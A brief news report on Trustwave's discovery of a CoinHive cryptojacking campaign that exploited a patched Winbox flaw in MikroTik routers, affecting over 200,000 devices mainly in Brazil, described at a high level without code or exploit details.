A new discovery by the researchers at Trustwave has revealed that a CoinHive cryptomining campaign has affected more than 200,000 MikroTik routers.
Researchers got alerted after witnessing a rise in the CoinHive activity in Brazil. Further research revealed that the MikroTik routers are the root of the activities. Through the campaign, bad actors behind the campaign use zero-day in Winbox component of MikroTik routers. The vulnerability was patched by the company within a day, but there are many routers that have not applied the patch.
According to the report by Trustwave, the attacker is using the device’s functionality to inject the CoinHive script into every webpage visited by the users. The attackers have used one of the proof-of-concept code which appeared on GitHub for altering the traffic passing through the MikroTik router.
Only one CoinHIve key has been used in the devices which shows that only one threat actor is behind all the attacks.
“if a user receives an error page of any kind while web browsing, they will get this custom error page which will mine CoinHive for the attacker,” said the report.
The attack is spreading at a massive pace and has affected some of the non-MikroTik users as well.